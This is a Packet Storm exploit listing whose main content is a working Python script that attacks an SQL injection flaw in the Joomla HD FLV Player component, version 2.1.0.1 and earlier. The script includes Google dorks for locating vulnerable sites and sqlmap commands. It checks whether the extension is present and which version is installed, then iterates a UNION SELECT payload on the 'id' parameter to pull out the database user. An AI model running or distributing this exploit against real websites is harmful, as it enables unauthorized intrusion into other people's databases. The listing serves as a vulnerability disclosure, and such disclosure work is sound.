Joomla HD FLV 2.1.0.1 SQL Injection

2014-11-13T00:00:00
ID PACKETSTORM:129098
Type packetstorm
Reporter Claudio Viviani
Modified 2014-11-13T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#  
# Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection  
#  
# Exploit Author : Claudio Viviani  
#  
# Vendor Homepage : http://www.hdflvplayer.net/  
#  
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5  
#  
# Dork google 1: inurl:/component/hdflvplayer/  
# Dork google 2: inurl:com_hdflvplayer   
#  
# Date : 2014-11-11  
#  
# Tested on : BackBox 3.x/4.x  
#  
# Info: The variable "id" is not sanitized (again)  
# Over 80.000 downloads (statistic reported on official site)  
#  
#  
# Video Demo: http://youtu.be/-EdOQSjAhW8  
#  
# Poc:   
# http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]  
# http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)  
#  
# Poc sqlmap:  
# sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql  
# sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)  
#  
# http connection  
import urllib, urllib2  
# string manipulation  
import re  
# Errors management  
import sys  
# Args management  
import optparse  
  
# Check url  
def checkurl(url):  
if url[:8] != "https://" and url[:7] != "http://":  
print('[X] You must insert http:// or https:// procotol')  
sys.exit(1)  
else:  
return url  
  
banner = """  
_______ __ ___ ___ ______   
| _ .-----.-----.--------| .---.-. | Y | _ \   
|___| | _ | _ | | | _ | |. 1 |. | \   
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \   
|: 1 | |: | |: 1 /   
|::.. . | |::.|:. |::.. . /   
`-------' `--- ---`------'   
_______ ___ ___ ___ _______ __   
| _ | | | Y | | _ | .---.-.--.--.-----.----.  
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|  
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|   
|: | |: 1 |: 1 | |: | |_____|   
|::.| |::.. . |\:.. ./ |::.|   
`---' `-------' `---' `---'   
<= 2.1.0.1 Sql Injection  
  
Written by:  
  
Claudio Viviani  
  
http://www.homelab.it  
  
info@homelab.it  
homelabit@protonmail.ch  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
"""  
  
commandList = optparse.OptionParser('usage: %prog -t URL')  
commandList.add_option('-t', '--target', action="store",  
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",  
)  
  
options, remainder = commandList.parse_args()  
  
# Check args  
if not options.target:  
print(banner)  
commandList.print_help()  
sys.exit(1)  
  
host = checkurl(options.target)  
  
checkext = 0  
  
evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }  
  
char = "%2CNULL"  
endurl = "%2CNULL%23"  
bar = "#"  
  
print(banner)  
  
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}  
  
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")  
  
try:  
req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)  
response = urllib2.urlopen(req).readlines()  
  
for line_version in response:  
  
if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:  
checkext += 1  
else:  
checkext += 0  
  
if checkext > 0:   
sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")  
else:  
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")  
sys.exit(1)  
  
except urllib2.HTTPError:  
sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")  
sys.exit(1)  
  
except urllib2.URLError as e:  
print("\n[X] Connection Error: "+str(e.code))  
sys.exit(1)  
  
print("")  
  
sys.stdout.write("\r[+] Checking Version: ")  
  
try:  
req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)  
response = urllib2.urlopen(req).readlines()  
  
for line_version in response:  
  
if not line_version.find("<version>") == -1:  
  
VER = re.compile('>(.*?)<').search(line_version).group(1)  
  
sys.stdout.write("\r[+] Checking Version: "+str(VER))  
  
except urllib2.HTTPError:  
sys.stdout.write("\r[+] Checking Version: Unknown")  
  
except urllib2.URLError as e:  
print("\n[X] Connection Error: "+str(e.code))  
sys.exit(1)  
  
print("")  
  
for exploiting, dork in evilurl.iteritems():  
  
s = ""  
barcount = ""  
for a in range(1,100):  
  
s += char  
try:  
req = urllib2.Request(host+exploiting+s+endurl, None, headers)  
response = urllib2.urlopen(req).read()  
  
if "h0m3l4b1t" in response:  
print "\n[!] VULNERABLE"  
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)  
print "[*] Username: "+str(current_user)  
print ""  
print "[*] 3v1l Url: "+host+exploiting+s+endurl  
sys.exit(0)  
  
except urllib2.HTTPError as e:  
response = e.read()  
if "h0m3l4b1t" in response:  
print "\n[!] VULNERABLE"  
current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)  
print "[*] Username: "+str(current_user)  
print ""  
print "[*] 3v1l Url: "+host+exploiting+s+endurl  
sys.exit(0)  
  
except urllib2.URLError as e:  
print("\n[X] Connection Error: "+str(e.code))  
sys.exit(1)  
  
barcount += bar  
sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)  
sys.stdout.flush()  
  
print "\n[X] Not vulnerable :("  
print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"  
`